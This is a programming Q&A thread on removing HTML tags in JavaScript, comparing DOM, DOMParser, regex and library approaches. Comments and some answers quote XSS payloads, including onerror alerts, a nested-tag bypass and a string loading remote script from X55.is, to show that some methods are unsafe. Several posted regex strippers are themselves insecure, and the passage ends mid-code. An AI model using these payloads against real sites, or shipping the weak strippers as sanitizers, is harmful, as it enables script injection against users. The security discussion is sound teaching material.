Strip HTML tags from text using plain JavaScript

Question

How can I strip HTML tags from a string using plain JavaScript only, without using a library?

Black · Accepted Answer · 2020-10-23 14:11:18Z

922

If you're running in a browser, then the easiest way is just to let the browser do it for you...

function stripHtml(html)
{
   let tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can still let the browser do the work for you - see Saba's answer on using the now widely-available DOMParser.

edited Oct 23, 2020 at 14:11

Black

answered May 4, 2009 at 22:48

Shog9

19 Comments

kangax Over a year ago

Just remember that this approach is rather inconsistent and will fail to strip certain characters in certain browsers. For example, in Prototype.js, we use this approach for performance, but work around some of the deficiencies - github.com/kangax/prototype/blob/…

Magnus Smith Over a year ago

Remember your whitespace will be messed about. I used to use this method, and then had problems as certain product codes contained double spaces, which ended up as single spaces after I got the innerText back from the DIV. Then the product codes did not match up later in the application.

Shog9 Over a year ago

@Magnus Smith: Yes, if whitespace is a concern - or really, if you have any need for this text that doesn't directly involve the specific HTML DOM you're working with - then you're better off using one of the other solutions given here. The primary advantages of this method are that it is 1) trivial, and 2) will reliably process tags, whitespace, entities, comments, etc. in the same way as the browser you're running in. That's frequently useful for web client code, but not necessarily appropriate for interacting with other systems where the rules are different.

Mike Samuel Over a year ago

Don't use this with HTML from an untrusted source. To see why, try running strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

douyw Over a year ago

If html contains images(img tags), the images will be requested by the browser. That's not good.

Mike Samuel · Accepted Answer · 2019-05-30 09:28:35Z

807

myString.replace(/<[^>]*>?/gm, '');
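
A quick way to see what this one-liner does and does not handle is to wrap it in a function and feed it a couple of inputs. This is only a sketch: the name stripTagsNaive and the sample strings are made up for illustration. The second call shows what happens when a quoted attribute value contains a ">".

```javascript
// Hypothetical wrapper name; the regex is the one from the answer above.
function stripTagsNaive(input) {
  return String(input).replace(/<[^>]*>?/gm, '');
}

// Well-formed markup without ">" inside attributes is stripped as expected.
const simple = stripTagsNaive('<p>Hello <b>world</b></p>');

// A ">" inside a quoted attribute ends the match early, so the tail of the
// attribute leaks into the output.
const tricky = stripTagsNaive('<button onClick="dostuff(\'>\');">Go</button>');

console.log(simple);
console.log(tricky);
```

So it is fine for tidying up markup you already trust, but the leftover fragments are one reason not to treat it as a security filter.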

edited May 30, 2019 at 9:28

Mike Samuel

answered May 4, 2009 at 22:42

nickf

24 Comments

Mike Samuel Over a year ago

Doesn't work for <img src=http://www.google.com.kh/images/srpr/nav_logo27.png onload="alert(42)" if you're injecting via document.write or concatenating with a string that contains a > before injecting via innerHTML.

Mike Samuel Over a year ago

@PerishableDave, I agree that the > will be left in the second. That's not an injection hazard though. The hazard occurs due to < left in the first, which causes the HTML parser to be in a context other than data state when the second starts. Note there is no transition from data state on >.

Ziggy Over a year ago

@MikeSamuel Did we decide on this answer yet? Naive user here ready to copy-paste.

Jonathon Over a year ago

This also, I believe, gets completely confused if given something like <button onClick="dostuff('>');"></button> Assuming correctly written HTML, you still need to take into account that a greater than sign might be somewhere in the quoted text in an attribute. Also you would want to remove all the text inside of <script> tags, at least.

Mike Samuel Over a year ago

@AntonioMax, I've answered this question ad nauseam, but to the substance of your question, because security critical code shouldn't be copied & pasted. You should download a library, and keep it up-to-date and patched so that you're secure against recently discovered vulnerabilities and to changes in browsers.

starball · Accepted Answer · 2022-12-27 01:09:05Z

330

I would like to share an edited version of Shog9's accepted answer.

As Mike Samuel pointed out in a comment, that function can execute inline JavaScript code.
But Shog9 is right when saying "let the browser do it for you..."

So here is my edited version, using DOMParser:

function strip(html){
   let doc = new DOMParser().parseFromString(html, 'text/html');
   return doc.body.textContent || "";
}

Here is the code to test the inline JavaScript:

strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

Also, it does not request resources (like images) on parse:

strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")

edited Dec 27, 2022 at 1:09

starball♦

answered Nov 6, 2017 at 15:46

Sabaz

11 Comments

kris_IV Over a year ago

It's worth adding that this solution works only in the browser.

Daantje Over a year ago

This is not strip tags, but more like PHP htmlspecialchars(). Still useful for me.

Raine Revere Over a year ago

Note that this also removes whitespace from the beginning of the text.

törzsmókus Over a year ago

also, it does not try to parse html using regex

the_previ Over a year ago

This should be the accepted answer because it's the safest and fastest way to do

Community · Accepted Answer · 2012-08-24 18:18:28Z

279

Simplest way:

jQuery(html).text();

That retrieves all the text from a string of html.

edited Aug 24, 2012 at 18:18

CommunityBot

answered Dec 26, 2011 at 1:26

Mark

21 Comments

Mark Over a year ago

We always use jQuery for projects since invariably our projects have a lot of Javascript. Therefore we didn't add bulk, we took advantage of existing API code...

Rafael Herscovici Over a year ago

You use it, but the OP might not. the question was about Javascript NOT JQuery.

acjay Over a year ago

It's still a useful answer for people who need to do the same thing as the OP (like me) and don't mind using jQuery (like me), not to mention, it could have been useful to the OP if they were considering using jQuery. The point of the site is to share knowledge. Keep in mind that the chilling effect you might have by chastising useful answers without good reason.

Eric G Over a year ago

@Dementic shockingly, I find the threads with multiple answers to be the most useful, because often a secondary answer meets my exact needs, while the primary answer meets the general case.

Aamir Afridi Over a year ago

That will not work if some part of the string is not wrapped in an HTML tag, e.g. "<b>Error:</b> Please enter a valid email" will return only "Error:"

Black · Accepted Answer · 2020-10-23 14:47:34Z

61

As an extension to the jQuery method, if your string might not contain HTML (e.g. if you are trying to remove HTML from a form field), then

jQuery(html).text();

will return an empty string if there is no HTML

Use:

jQuery('<p>' + html + '</p>').text();

instead.

Update: As has been pointed out in the comments, in some circumstances this solution will execute JavaScript contained within html. If the value of html could be influenced by an attacker, use a different solution.

edited Oct 23, 2020 at 14:47

Black

answered Jan 15, 2013 at 12:20

user999305

3 Comments

Dimitar Dimitrov Over a year ago

Or $("<p>").html(html).text();

Simon Over a year ago

This still executes probably dangerous code jQuery('<span>Text :) <img src="a" onerror="alert(1)"></span>').text()

Grzegorz Kaczan Over a year ago

try jQuery("aa&#X003c;script>alert(1)&#X003c;/script>a").text();

Victor · Accepted Answer · 2015-06-18 14:21:56Z

50

Converting HTML for Plain Text emailing keeping hyperlinks (a href) intact

The above function posted by hypoxide works fine, but I was after something that would convert HTML created in a web rich-text editor (for example FCKEditor), clearing out all HTML but leaving all the links, because I wanted both the HTML and the plain-text version in order to create the correct parts of an SMTP email (both HTML and plain text).

After a long time of searching Google, my colleagues and I came up with this, using the regex engine in JavaScript:

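var str = 'this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>';
// Turn <br> and <p> tags into newlines
str = str.replace(/<br>/gi, "\n");
// Non-greedy, so only the opening <p ...> tag is replaced, not the paragraph text
str = str.replace(/<p.*?>/gi, "\n");
// Keep the link text ($2) and append the href ($1)
str = str.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
// Remove every remaining tag
str = str.replace(/<(?:.|\s)*?>/g, "");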

the str variable starts out like this:

this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>

and then after the code has run it looks like this:-

this string has html code i want to remove
Link Number 1 -> BBC (Link->http://www.bbc.co.uk)  Link Number 1


Now back to normal text and stuff

As you can see, all the HTML has been removed and the links have been preserved, with the hyperlinked text still intact. I have also replaced the <p> and <br> tags with \n (newline char) so that some visual formatting is retained.

To change the link format (e.g. BBC (Link->http://www.bbc.co.uk)), just edit the $2 (Link->$1), where $1 is the href URL/URI and $2 is the hyperlinked text. With the links directly in the body of the plain text, most SMTP mail clients convert them so the user can click on them.

Hope you find this useful.
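
If the link format needs to vary, the same replace chain can be wrapped in a function that takes the formatting as a callback. The following is a rough sketch under a few assumptions: htmlToTextWithLinks and formatLink are hypothetical names, the patterns are slightly tightened variants of the ones above (not the original ones), and href values are assumed to be double-quoted.

```javascript
// Hypothetical helper: strips tags but keeps links in a configurable text form.
function htmlToTextWithLinks(html, formatLink) {
  // Default format mirrors the " $2 (Link->$1) " replacement used above.
  var format = formatLink || function (text, url) {
    return " " + text + " (Link->" + url + ") ";
  };
  return html
    // <br>, <br/> and <br /> become newlines
    .replace(/<br\s*\/?>/gi, "\n")
    // opening <p ...> tags become newlines (\b keeps <pre> etc. out)
    .replace(/<p\b[^>]*>/gi, "\n")
    // links: keep the text and the double-quoted href value
    .replace(/<a\b[^>]*\bhref="([^"]*)"[^>]*>(.*?)<\/a>/gi, function (match, url, text) {
      return format(text, url);
    })
    // everything else that looks like a tag is dropped
    .replace(/<[^>]*>/g, "");
}

var sample = 'See <a href="http://www.bbc.co.uk">BBC</a><br>now';
console.log(htmlToTextWithLinks(sample));
console.log(htmlToTextWithLinks(sample, function (text, url) {
  return text + " [" + url + "]";
}));
```

Note that a custom format should avoid angle brackets around the URL, since the final replace would strip them as if they were a tag.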

edited Jun 18, 2015 at 14:21

Victor

answered Aug 6, 2009 at 8:30

Jibberboy2000

2 Comments

Rose Nettoyeur Over a year ago

It doesn't handle &nbsp;

törzsmókus Over a year ago

obligatory caveat: stackoverflow.com/a/1732454/501765

Janghou · Accepted Answer · 2018-09-19 15:26:03Z

37

An improvement to the accepted answer.

function strip(html)
{
   var tmp = document.implementation.createHTMLDocument("New").body;
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

This way, running something like this will do no harm:

strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

Firefox, Chromium and Explorer 9+ are safe. Opera Presto is still vulnerable. Also images mentioned in the strings are not downloaded in Chromium and Firefox saving http requests.

edited Sep 19, 2018 at 15:26

answered Jul 31, 2013 at 20:14

Janghou

6 Comments

Arth Over a year ago

This is some of the way there, but isn't safe from <script><script>alert();

Janghou Over a year ago

That doesn't run any scripts here in Chromium/Opera/Firefox on Linux, so why isn't it safe?

Arth Over a year ago

My apologies, I must have miss-tested, I probably forgot to click run again on the jsFiddle.

Jon Schneider Over a year ago

The "New" argument is superfluous, I think?

Janghou Over a year ago

According to the specs it's optional nowadays, but it wasn't always.

Karl.S · Accepted Answer · 2023-07-06 23:18:22Z

36

This should work in any JavaScript environment (Node.js included).

    const text = `
    <html lang="en">
      <head>
        <style type="text/css">*{color:red}</style>
        <script>alert('hello')</script>
      </head>
      <body><b>This is some text</b><br/></body>
    </html>`;
    
    // Remove style tags and content ([\s\S]*? also spans newlines and stops at the first closing tag)
    const stripped = text.replace(/<style[^>]*>[\s\S]*?<\/style>/gi, '')
        // Remove script tags and content
        .replace(/<script[^>]*>[\s\S]*?<\/script>/gi, '')
        // Remove all opening, closing and orphan HTML tags
        .replace(/<[^>]+>/g, '')
        // Remove leading spaces and repeated CR/LF
        .replace(/([\r\n]+ +)+/g, '');

edited Jul 6, 2023 at 23:18

answered Jan 20, 2017 at 5:49

Karl.S

6 Comments

Karl.S Over a year ago

@pstanton could you give a working example of your statement ?

pstanton Over a year ago

<html><style..>* {font-family:comic-sans;}</style>Some Text</html>

Karl.S Over a year ago

@pstanton I have fixed the code and added comments, sorry for the late response.

törzsmókus Over a year ago

please consider reading these caveats: stackoverflow.com/a/1732454/501765

mickmackusa Over a year ago

Since there are no start of string or end of string anchors, the m pattern modifier is pointless. Since the first two patterns have common starts and finished, perhaps consolidate them by capturing the tagname and then using a backreference for the ending tag.
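
The consolidation suggested in this comment could look roughly like the sketch below: the tag name is captured and a backreference matches the closing tag, so one pattern covers both script and style. The function name stripHtmlWithBlocks is hypothetical, and the whitespace collapsing at the end is an extra assumption, not part of the answer.

```javascript
// Hypothetical helper illustrating the capture + backreference idea.
function stripHtmlWithBlocks(html) {
  return html
    // Remove <script>...</script> and <style>...</style> with their content.
    // \1 refers back to whichever tag name was captured; [\s\S] spans newlines.
    .replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, '')
    // Remove all remaining opening, closing and orphan tags.
    .replace(/<[^>]+>/g, '')
    // Collapse runs of whitespace (assumption: layout does not matter here).
    .replace(/\s+/g, ' ')
    .trim();
}

const page = '<style type="text/css">*{color:red}</style>\n' +
  '<script>alert("hello")</script>\n' +
  '<b>This is some text</b><br/>';
console.log(stripHtmlWithBlocks(page));
```

The usual caveat about parsing HTML with regular expressions still applies; this only tidies up the patterns, it does not make them a parser.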

hegemon · Accepted Answer · 2018-07-06 10:39:57Z

23

var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");

This is a regex version, which is more resilient to malformed HTML, like:

Unclosed tags

Some text <img

"<", ">" inside tag attributes

Some text <img alt="x > y">

Newlines

Some <a href="http://google.com">

The code

var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
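
To make the cases above easier to try out, here is a small sketch that wraps the same regex in a function and runs it over them. The names TAG_PATTERN and stripTagsResilient are made up for this example. The last call shows a limitation worth knowing about: a bare "<" in ordinary text is treated as the start of a tag.

```javascript
// Same pattern as in the answer; quoted attribute values are consumed as a
// unit, and an unclosed tag is allowed to run to the end of the string.
const TAG_PATTERN = /<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g;

// Hypothetical wrapper name.
function stripTagsResilient(html) {
  return html.replace(TAG_PATTERN, "");
}

console.log(JSON.stringify(stripTagsResilient('Some text <img')));
console.log(JSON.stringify(stripTagsResilient('Some text <img alt="x > y">')));
console.log(JSON.stringify(stripTagsResilient('Some <a href="http://google.com">\nlink</a> here')));

// Limitation: a "<" in plain text swallows everything up to the next ">".
console.log(JSON.stringify(stripTagsResilient('1 < 2 and 3 > 1')));
```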

answered Jul 6, 2018 at 10:39

hegemon

2 Comments

Ade Over a year ago

How could you flip this to do literally the opposite? I want to use string.replace() on ONLY the text part, and leave any HTML tags and their attributes unchanged.

Leigh Mathieson Over a year ago

My personal favourite, I would also add to remove newlines like:

const deTagged = myString.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, '');     const deNewlined = deTagged.replace(/\n/g, '');

Community · Accepted Answer · 2017-05-23 11:54:58Z

19

I altered Jibberboy2000's answer to include several <BR /> tag formats, remove everything inside <SCRIPT> and <STYLE> tags, tidy the resulting text by collapsing multiple line breaks and spaces, and convert some HTML-encoded characters back to normal. After some testing, it appears that you can convert most full web pages into simple text where the page title and content are retained.

In the simple example,

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--comment-->

<head>

<title>This is my title</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>

    body {margin-top: 15px;}
    a { color: #D80C1F; font-weight:bold; text-decoration:none; }

</style>
</head>

<body>
    <center>
        This string has <i>html</i> code i want to <b>remove</b><br>
        In this line <a href="http://www.bbc.co.uk">BBC</a> with link is mentioned.<br/>Now back to &quot;normal text&quot; and stuff using &lt;html encoding&gt;                 
    </center>
</body>
</html>

becomes

This is my title

This string has html code i want to remove

In this line BBC (http://www.bbc.co.uk) with link is mentioned.

Now back to "normal text" and stuff using <html encoding>

The JavaScript function and test page look like this:

function convertHtmlToText() {
    var inputText = document.getElementById("input").value;
    var returnText = "" + inputText;

    //-- remove BR tags and replace them with line break
    returnText=returnText.replace(/<br>/gi, "\n");
    returnText=returnText.replace(/<br\s\/>/gi, "\n");
    returnText=returnText.replace(/<br\/>/gi, "\n");

    //-- remove P and A tags but preserve what's inside of them
    returnText=returnText.replace(/<p.*>/gi, "\n");
    returnText=returnText.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 ($1)");

    //-- remove all inside SCRIPT and STYLE tags
    returnText=returnText.replace(/<script.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/script>/gi, "");
    returnText=returnText.replace(/<style.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/style>/gi, "");
    //-- remove all else
    returnText=returnText.replace(/<(?:.|\s)*?>/g, "");

    //-- get rid of more than 2 multiple line breaks:
    returnText=returnText.replace(/(?:(?:\r\n|\r|\n)\s*){2,}/gim, "\n\n");

    //-- get rid of more than 2 spaces:
    returnText = returnText.replace(/ +(?= )/g,'');

    //-- get rid of html-encoded characters:
    returnText=returnText.replace(/&nbsp;/gi," ");
    returnText=returnText.replace(/&amp;/gi,"&");
    returnText=returnText.replace(/&quot;/gi,'"');
    returnText=returnText.replace(/&lt;/gi,'<');
    returnText=returnText.replace(/&gt;/gi,'>');

    //-- return
    document.getElementById("output").value = returnText;
}

It was used with this HTML:

<textarea id="input" style="width: 400px; height: 300px;"></textarea><br />
<button onclick="convertHtmlToText()">CONVERT</button><br />
<textarea id="output" style="width: 400px; height: 300px;"></textarea><br />
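
The entity replacements in the function above run one after another, so a string like &amp;lt; ends up decoded twice (first to &lt;, then to <). A single-pass decoder avoids that and can also handle numeric references. This is only a sketch: decodeBasicEntities and NAMED_ENTITIES are hypothetical names, and the table covers just a handful of entities, nowhere near the full HTML list.

```javascript
// Small, deliberately incomplete table of named entities (assumption:
// &nbsp; maps to a regular space, as in the function above).
var NAMED_ENTITIES = { nbsp: " ", amp: "&", quot: '"', lt: "<", gt: ">", apos: "'" };

// Hypothetical helper: decodes named, decimal and hexadecimal entities
// in one pass, so already-decoded output is never decoded again.
function decodeBasicEntities(text) {
  return text.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, function (match, body) {
    if (body.charAt(0) === "#") {
      var isHex = body.charAt(1).toLowerCase() === "x";
      var code = parseInt(body.slice(isHex ? 2 : 1), isHex ? 16 : 10);
      // Leave references outside the Unicode range untouched.
      return code <= 0x10ffff ? String.fromCodePoint(code) : match;
    }
    var key = body.toLowerCase();
    // Unknown names are left as they are.
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, key)
      ? NAMED_ENTITIES[key]
      : match;
  });
}

console.log(decodeBasicEntities('&quot;a&quot; &lt;b&gt; &amp;lt; &#65;&#x42;'));
```

For anything beyond a quick conversion, a maintained entity library is likely the better choice, since the complete list of named entities is long.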

edited May 23, 2017 at 11:54

CommunityBot

answered Jan 10, 2012 at 12:59

Lenka Pitonakova

6 Comments

Daniel Gerson Over a year ago

I like this solution because it has treatment of html special characters... but still not nearly enough of them... the best answer for me would deal with all of them. (which is probably what jquery does).

cbron Over a year ago

I think /<p.*>/gi should be /<p.*?>/gi.

Alexis Wilke Over a year ago

Note that to remove all <br> tags you could use a good regular expression instead: /<br\s*\/?>/ that way you have just one replace instead of 3. Also it seems to me that except for the decoding of entities you can have a single regex, something like this: /<[a-z].*?\/?>/.

Hristo Enev Over a year ago

Nice script. But what about table content? Any idea how can it be displayed

KyleMit Over a year ago

@DanielGerson, encoding html gets real hairy, real quick, but the best approach seems to be using the he library

Anatol Zakrividoroga · Accepted Answer · 2020-10-27 06:03:14Z

16

from CSS tricks:

https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

const originalString = `
  <div>
    <p>Hey that's <span>somthing</span></p>
  </div>
`;

const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");

console.log(strippedString);

edited Oct 27, 2020 at 6:03

answered Sep 3, 2020 at 15:52

Anatol Zakrividoroga

1 Comment

Guillaume F. Over a year ago

This fails to remove what is inside <script> and <style> tags but otherwise it is the cleanest solution.

Ankit Kumawat · Accepted Answer · 2022-07-14 06:25:29Z

10

const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)

answered Jul 14, 2022 at 6:25

Ankit Kumawat

1 Comment

Pawan Deore Over a year ago

doesn't work in next js as it is server side rendered but nice solution for traditional applications. use this instead - const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");

Bryan · Accepted Answer · 2009-05-04 23:14:30Z

8

Another, admittedly less elegant solution than nickf's or Shog9's, would be to recursively walk the DOM starting at the <body> tag and append each text node.

var bodyContent = document.getElementsByTagName('body')[0];
var result = appendTextNodes(bodyContent);

function appendTextNodes(element) {
    var text = '';

    // Loop through the childNodes of the passed in element
    for (var i = 0, len = element.childNodes.length; i < len; i++) {
        // Get a reference to the current child
        var node = element.childNodes[i];
        // Append the node's value if it's a text node
        if (node.nodeType == 3) {
            text += node.nodeValue;
        }
        // Recurse through the node's children, if there are any,
        // and append the text they return
        if (node.childNodes.length > 0) {
            text += appendTextNodes(node);
        }
    }
    // Return the final result
    return text;
}

answered May 4, 2009 at 23:14

Bryan

3 Comments

nickf Over a year ago

yikes. if you're going to create a DOM tree out of your string, then just use shog's way!

Bryan Over a year ago

Yes, my solution wields a sledge-hammer where a regular hammer is more appropriate :-). And I agree that yours and Shog9's solutions are better, and basically said as much in the answer. I also failed to reflect in my response that the html is already contained in a string, rendering my answer essentially useless as regards the original question anyway. :-(

Shog9 Over a year ago

To be fair, this has value - if you absolutely must preserve /all/ of the text, then this has at least a decent shot at capturing newlines, tabs, carriage returns, etc... Then again, nickf's solution should do the same, and do much faster... eh.

gyula.nemeth · Accepted Answer · 2016-08-04 07:38:10Z

If you want to keep the links and the structure of the content (h1, h2, etc.), then you should check out TextVersionJS. You can use it with any HTML, although it was created to convert an HTML email to plain text.

The usage is very simple. For example in node.js:

var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";

var textVersion = createTextVersion(yourHtml);

Or in the browser with pure js:

<script src="textversion.js"></script>
<script>
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
</script>

It also works with require.js:

define(["textversionjs"], function(createTextVersion) {
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
});

AkshayBandivadekar · Accepted Answer · 2020-04-07 13:33:59Z

6

For easier solution, try this => https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");

answered Apr 7, 2020 at 13:33

AkshayBandivadekar

1 Comment

mickmackusa Over a year ago

Which characters in your pattern are made case-insensitive by that i pattern modifier? I see no need for capturing parentheses -- anywhere in the pattern. Bad copy-pasta? Maybe someone should whisper to Chris Coyier.

Johannes Fahrenkrug · Accepted Answer · 2021-11-09 14:26:55Z

6

It is also possible to use the fantastic htmlparser2 pure JS HTML parser. Here is a working demo:

var htmlparser = require('htmlparser2');

var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';

var result = [];

var parser = new htmlparser.Parser({
    ontext: function(text){
        result.push(text);
    }
}, {decodeEntities: true});

parser.write(body);
parser.end();

result.join('');

The output will be This is a simple example.

See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html

This works in both node and the browser if you pack your web application using a tool like webpack.

edited Nov 9, 2021 at 14:26

answered Dec 29, 2015 at 19:11

Johannes Fahrenkrug

Harry Stevens · Accepted Answer · 2017-01-27 06:55:53Z

A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.

function removeTags(string, array){
  return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
  function f(array, value){
    return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
  }
}

var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>

Jaxolotl · Accepted Answer · 2011-10-04 14:02:41Z

4

I made some modifications to the original Jibberboy2000 script. Hope it'll be useful for someone.

str = '**ANY HTML CONTENT HERE**';

str=str.replace(/<\s*br\/*>/gi, "\n");
str=str.replace(/<\s*a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
str=str.replace(/<\s*\/*.+?>/ig, "\n");
str=str.replace(/ {2,}/gi, " ");
str=str.replace(/\n+\s*/gi, "\n\n");

answered Oct 4, 2011 at 14:02

Jaxolotl

Deminetix · Accepted Answer · 2015-06-11 22:06:11Z

4

After trying all of the answers mentioned most if not all of them had edge cases and couldn't completely support my needs.

I started exploring how php does it and came across the php.js lib which replicates the strip_tags method here: http://phpjs.org/functions/strip_tags/

answered Jun 11, 2015 at 22:06

Deminetix

2 Comments

Alexis Wilke Over a year ago

This is a neat function and well documented. However, it can be made faster when allowed == '' which I think is what the OP asked for, which is nearly what Byron answered below (Byron only got the [^>] wrong.)

Chris Cinelli Over a year ago

If you use the allowed param you are vulnerable to XSS: stripTags('<p onclick="alert(1)">mytext</p>', '<p>') returns <p onclick="alert(1)">mytext</p>

3 revs, 2 users 91% · Accepted Answer · 2016-03-27 07:29:37Z

4

function stripHTML(my_string){
    var charArr   = my_string.split(''),
        resultArr = [],
        htmlZone  = 0,
        quoteZone = 0;
    for( var x=0; x < charArr.length; x++ ){
     switch( charArr[x] + htmlZone + quoteZone ){
       case "<00" : htmlZone  = 1;break;
       case ">10" : htmlZone  = 0;resultArr.push(' ');break;
       case '"10' : quoteZone = 1;break;
       case "'10" : quoteZone = 2;break;
       case '"11' : 
       case "'12" : quoteZone = 0;break;
       default    : if(!htmlZone){ resultArr.push(charArr[x]); }
     }
    }
    return resultArr.join('');
}

Accounts for > inside attributes and <img onerror="javascript"> in newly created dom elements.

usage:

clean_string = stripHTML("string with <html> in it")

demo:

https://jsfiddle.net/gaby_de_wilde/pqayphzd/

demo of top answer doing the terrible things:

https://jsfiddle.net/gaby_de_wilde/6f0jymL6/1/

edited Mar 27, 2016 at 7:29

community wiki

3 revs, 2 users 91%
user40521

1 Comment

Logan Pickup Over a year ago

You'll need to handle escaped quotes inside an attribute value too (e.g. string with <a malicious="attribute \">this text should be removed, but is not">example</a>).

AmerllicA · Accepted Answer · 2022-11-19 19:43:18Z

4

A very good library is sanitize-html, which is a pure JavaScript function and works in any environment.

In my case, on React Native, I needed to remove all HTML tags from the given texts, so I created this wrapper function:

import sanitizer from 'sanitize-html';

const textSanitizer = (textWithHTML: string): string =>
  sanitizer(textWithHTML, {
    allowedTags: [],
  });

export default textSanitizer;

Now, by using my textSanitizer, I get the pure text contents.

answered Nov 19, 2022 at 19:43

AmerllicA

1 Comment

Zathrus Writer Over a year ago

so far the only NPM package that can sanitize some very strange HTML, such as:

<iframe srcdoc="<script src='XXXXXXX'></script>" style="display: none" data-web="YYYYYYY" data-hash="ZZZZZZZZZZZZZ"></iframe>

Jeremy Johnstone · Accepted Answer · 2012-07-12 21:10:24Z

3

Here's a version which sorta addresses @MikeSamuel's security concern:

function strip(html)
{
   try {
       var doc = document.implementation.createDocument('http://www.w3.org/1999/xhtml', 'html', null);
       doc.documentElement.innerHTML = html;
       return doc.documentElement.textContent||doc.documentElement.innerText;
   } catch(e) {
       return "";
   }
}

Note, it will return an empty string if the HTML markup isn't valid XML (aka, tags must be closed and attributes must be quoted). This isn't ideal, but does avoid the issue of having the security exploit potential.

If you need to handle markup that is not valid XML, you could try using:

var doc = document.implementation.createHTMLDocument("");

but that isn't a perfect solution either for other reasons.

edited Jul 12, 2012 at 21:10

answered Jul 12, 2012 at 20:38

Jeremy Johnstone

1 Comment

Alexis Wilke Over a year ago

That will fail in many circumstances if the text comes from user input (textarea or contenteditable widget...)

FrigginGlorious · Accepted Answer · 2016-01-06 18:57:29Z

3

I just needed to strip out the <a> tags and replace them with the text of the link.

This seems to work great.

htmlContent= htmlContent.replace(/<a.*href="(.*?)">/g, '');
htmlContent= htmlContent.replace(/<\/a>/g, '');

edited Jan 6, 2016 at 18:57

answered Aug 19, 2013 at 16:12

FrigginGlorious

2 Comments

m3nda Over a year ago

This only applies for a tags and needs tweaking for being a wide function.

Alexis Wilke Over a year ago

Yeah, plus an anchor tag could have many other attributes such as the title="...".

Samuel Eiche · Accepted Answer · 2023-06-07 15:31:26Z

3

To add to the DOMParser solution: our team found that it was still possible to inject malicious script using the basic solution.

\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'

\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>

We found that it was best to parse it recursively if any tags still exist after the initial parse.

function stripHTML(str) {
  const parsedHTML = new DOMParser().parseFromString(str, "text/html");
  const text = parsedHTML.body.textContent;

  if (/(<([^>]+)>)/gi.test(text)) {
    return stripHTML(text);
  }

  return text || "";
}

answered Jun 7, 2023 at 15:31

Samuel Eiche

Byron Carasco · Accepted Answer · 2011-01-10 05:40:34Z

2

I think the easiest way is to just use Regular Expressions as someone mentioned above. Although there's no reason to use a bunch of them. Try:

stringWithHTML = stringWithHTML.replace(/<\/?[a-z][a-z0-9]*[^<>]*>/ig, "");

answered Jan 10, 2011 at 5:40

Byron Carasco

2 Comments

molnarg Over a year ago

Don't do this if you care about security. If the user input is this: '<scr<script>ipt>alert(42);</scr</script>ipt>' then the stripped version will be this: '<script>alert(42);</script>'. So this is an XSS vulnerability.
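
The nested-tag case from this comment is easy to reproduce, and it also shows why a single replace pass is not enough with this pattern. The sketch below is only an illustration: stripOnce and stripUntilStable are hypothetical names, and repeating the replacement until the string stops changing is one possible mitigation, not a substitute for a real sanitizer.

```javascript
// The pattern from the answer above.
var singlePass = /<\/?[a-z][a-z0-9]*[^<>]*>/gi;

// One pass: removes the inner tags, which lets the outer pieces join up.
function stripOnce(input) {
  return input.replace(singlePass, "");
}

// Hypothetical mitigation: keep stripping until nothing changes any more.
function stripUntilStable(input) {
  var previous;
  var current = input;
  do {
    previous = current;
    current = stripOnce(previous);
  } while (current !== previous);
  return current;
}

var nested = "<scr<script>ipt>alert(42);</scr</script>ipt>";
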